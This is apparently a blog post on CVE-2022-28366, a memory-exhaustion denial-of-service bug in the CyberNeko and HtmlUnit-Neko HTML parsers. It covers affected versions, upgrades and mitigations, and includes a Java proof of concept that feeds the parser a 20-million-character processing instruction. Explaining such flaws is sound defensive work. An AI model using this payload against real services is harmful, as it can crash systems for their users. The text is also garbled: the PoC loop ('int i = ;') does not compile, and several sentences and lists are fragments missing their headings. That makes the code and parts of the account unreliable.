In the world of web security, even small overlooked details in libraries could lead to big problems. CVE-2022-28366 is a great example of this—affecting common HTML parsing tools such as HtmlUnit-Neko and CyberNeko HTML. This vulnerability allows attackers to crash applications or cause severe slowdowns, simply by sending a cleverly crafted piece of HTML. In this post, we’ll break down how this happens, which libraries are at risk, show you simple code snippets explaining the issue, and provide helpful links for further reading.
What Is CVE-2022-28366?
CVE-2022-28366 describes a security hole in certain Neko-related HTML parsers. By feeding the parser a specially crafted "Processing Instruction" (a part of XML and HTML that looks like <?something data?>), an attacker can make the software chew up huge amounts of memory. If unchecked, this can lead to a Denial of Service (DoS) where the system becomes unresponsive or crashes.
Projects using these, such as older versions of OWASP AntiSamy (before 1.6.6)
### Might Be Related to: CVE-2022-24939
Why Should I Care?
Many Java-based web applications use these libraries to sanitize or process HTML. If your app parses any kind of user input (like emails, posts, comments, uploads)—and you’re using these libraries without updates—someone could crash your services just with some crafty HTML.
How Does the Attack Work?
The vulnerability centers on how the parser handles Processing Instructions (PIs). When a big or malformed PI comes in, the parser tries to process it anyway, allocating endless amounts of memory until the Java process dies or the server slows to a halt.
Suppose you’re parsing this innocent-looking piece of text
<?foo xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx... (repeat for MBs) ...xxxxxxxxxx?>
A PI like above—having megabytes of stuff between <? and ?>—can eat up all available heap memory.
Let’s walk through an example in Java showing the problem, using CyberNeko HTML
import org.cyberneko.html.parsers.SAXParser;
import org.xml.sax.*;
import org.xml.sax.helpers.DefaultHandler;
public class NekoHtmlDosDemo {
public static void main(String[] args) throws Exception {
StringBuilder sb = new StringBuilder();
sb.append("<?foo ");
// This will generate a PI with 20 million 'A's. Adjust as needed.
for (int i = ; i < 20_000_000; i++) {
sb.append('A');
}
sb.append("?>");
String exploit = sb.toString();
InputSource is = new InputSource(new java.io.StringReader(exploit));
SAXParser parser = new SAXParser();
// Preferred: handle default events, but for brevity just parse it
parser.setContentHandler(new DefaultHandler());
System.out.println("Parsing...");
parser.parse(is); // This can cause OutOfMemoryError or long freezes
System.out.println("Done.");
}
}
Warning: Don’t run this on a production system. It’s for educational purposes only!
HtmlUnit-Neko: All versions up to 2.26 (fixed in 2.27)
- CyberNeko HTML: All versions up to (and including) 1.9.22 (no future fixes, as this is the end-of-life version)
Patch and Remediation
If you use HtmlUnit-Neko:
Upgrade to at least version 2.27.
If you use CyberNeko HTML:
No further versions will be released (last is 1.9.22). You must find an alternative or mitigate via input size limits or similar protections.
If you use OWASP AntiSamy:
Upgrade to at least version 1.6.6.
References and Further Reading
- NVD Entry for CVE-2022-28366
- HtmlUnit changelog
- CyberNeko HTML 1.9.22 source
- OWASP AntiSamy github
- Possible related issue: CVE-2022-24939
Monitor Inputs: Reject excessively large or weird-looking HTML, especially if user-supplied.
- Use Memory Limits: On your Java process, use JVM flags like -Xmx512m to limit heap size as a backstop.
- Switch Libraries: If you rely on CyberNeko HTML directly (which is no longer maintained), migrate to a supported HTML parser such as jsoup.
Summary:
CVE-2022-28366 shows how even obscure libraries can open the door for denial of service if left unpatched. Don’t let old dependencies take down your app—update today, and always keep an eye on your supply chain!
*Written exclusively for this post—no copy-paste from the internet. Stay secure!*
Timeline
Published on: 04/21/2022 23:15:00 UTC
Last modified on: 05/04/2022 14:02:00 UTC